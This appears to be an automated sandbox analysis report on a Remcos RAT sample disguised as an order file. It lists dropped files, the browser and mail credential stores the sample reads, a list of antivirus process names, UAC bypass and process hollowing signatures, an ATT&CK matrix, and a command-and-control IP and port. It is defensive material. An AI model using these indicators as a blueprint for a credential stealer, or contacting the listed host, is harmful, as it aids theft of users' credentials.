                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: C:\Users\Public\Libraries\Wagotghl.PIF Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
                  Source: lhgtogaW.pif, 00000004.00000003.1795698080.000000002419F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerh
                  Source: lhgtogaW.pif, 00000004.00000003.1795698080.000000002419F000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002419F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.00000000241B8000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002419F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerBG\
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerW
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                  Source: lhgtogaW.pif, 00000004.00000003.1752355443.00000000241A6000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.00000000241A6000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.00000000241A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: 4_2_00434C52 cpuid 4_2_00434C52
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 0_2_028DD5D0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028C5A90
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: GetLocaleInfoA, 0_2_028CA780
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: GetLocaleInfoA, 0_2_028CA7CC
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028C5B9C
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 0_2_028DD5D0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 0_2_028E5FA0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoA, 4_2_0040F8D1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_2_00452036
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 4_2_004520C3
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_2_00452313
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_2_00448404
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_0045243C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_2_00452543
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_2_00452610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_2_004488ED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_2_00451CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_2_00451F50
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_2_00451F9B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoA, 4_1_0040F8D1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_1_00452036
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 4_1_004520C3
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_1_00452313
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_1_00448404
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_1_0045243C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_1_00452543
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 4_1_00452610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: GetLocaleInfoW, 4_1_004488ED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 4_1_00451CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_1_00451F50
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: EnumSystemLocalesW, 4_1_00451F9B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: 0_2_028C91C8 GetLocalTime, 0_2_028C91C8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: 4_2_0041B60D GetComputerNameExW,GetUserNameW, 4_2_0041B60D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: 4_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 4_2_004493AD
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe Code function: 0_2_028CB748 GetVersionExA, 0_2_028CB748
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgemc.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match File source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 4_2_0040BA12
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 4_1_0040BA12
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \key3.db 4_2_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: \key3.db 4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7548, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
                  Source: Yara match File source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: cmd.exe 4_2_0040569A
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif Code function: cmd.exe 4_1_0040569A
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information1
                  Scripting
                  1
                  Valid Accounts
                  1
                  Native API
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Shared Modules
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  2
                  Obfuscated Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  2
                  Software Packing
                  1
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  1
                  Windows Service
                  11
                  Access Token Manipulation
                  1
                  Timestomp
                  3
                  Credentials In Files
                  1
                  System Network Connections Discovery
                  Distributed Component Object Model211
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  1
                  DLL Side-Loading
                  LSA Secrets3
                  File and Directory Discovery
                  SSH3
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts522
                  Process Injection
                  1
                  Bypass User Account Control
                  Cached Domain Credentials48
                  System Information Discovery
                  VNCGUI Input Capture113
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder
                  11
                  Masquerading
                  DCSync1
                  Query Registry
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc Filesystem141
                  Security Software Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow1
                  Virtualization/Sandbox Evasion
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Access Token Manipulation
                  Network Sniffing4
                  Process Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd522
                  Process Injection
                  Input Capture1
                  Application Window Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                  System Owner/User Discovery
                  Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1431184; Sample: SHEOrder-10524.exe; Startdate: 24/04/2024; Architecture: WINDOWS; Score: 100. Numbers in square brackets are the graph's node IDs; the numbers in parentheses after a process name are the counters the legend describes (created registry values, created files).

Start [2]
  DNS/IP: web.fe.1drv.com; sn-files.fe.1drv.com; 5 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 13 other signatures
  Started: SHEOrder-10524.exe [8] (1, 7); Wagotghl.PIF [13]; Wagotghl.PIF [15]

SHEOrder-10524.exe [8]
  DNS/IP: dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
  Dropped: C:\Users\Public\Libraries\netutils.dll (PE32+); C:\Users\Public\Libraries\lhgtogaW.pif (PE32); C:\Users\Public\Libraries\easinvoker.exe (PE32+); C:\Users\Public\Wagotghl.url (MS)
  Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes
  Started: lhgtogaW.pif [17] (3, 16); extrac32.exe [22] (1); cmd.exe [24] (1)

Wagotghl.PIF [13]
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Sample uses process hollowing technique
  Started: lhgtogaW.pif [26]

Wagotghl.PIF [15]
  Started: lhgtogaW.pif [28]

lhgtogaW.pif [17]
  DNS/IP: 91.223.3.151, 4508, 49733, 49734 PL-SKYTECH-ASPL Poland; geoplugin.net 178.237.33.50, 49735, 80 ATOM86-ASATOM86NL Netherlands
  Dropped: C:\ProgramData\remcos\logs.dat (data)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected unpacking (changes PE section rights); Detected Remcos RAT; 9 other signatures
  Started: lhgtogaW.pif [30] (1); lhgtogaW.pif [33] (1); lhgtogaW.pif [35] (2)

extrac32.exe [22]
